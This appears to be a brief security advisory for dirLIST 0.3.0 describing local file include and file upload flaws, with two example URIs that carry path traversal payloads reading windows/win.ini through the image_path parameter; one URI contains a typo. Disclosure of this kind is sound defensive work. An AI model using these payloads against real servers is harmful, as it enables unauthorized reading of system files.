dirLIST Multiple Local File Include and Arbitrary File Upload Vulnerabilities

dirLIST Multiple Local File Include and Arbitrary File Upload Vulnerabilities

Attackers can exploit these issues through a browser.

The following example URIs are available:

http://www.example.com/dirlist_0.3.0/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../windows/win.ini
http://www.example.com/irlist_0.3.0/dirLIST_files/thumb_gen.php?image_path=../../../../../windows/win.ini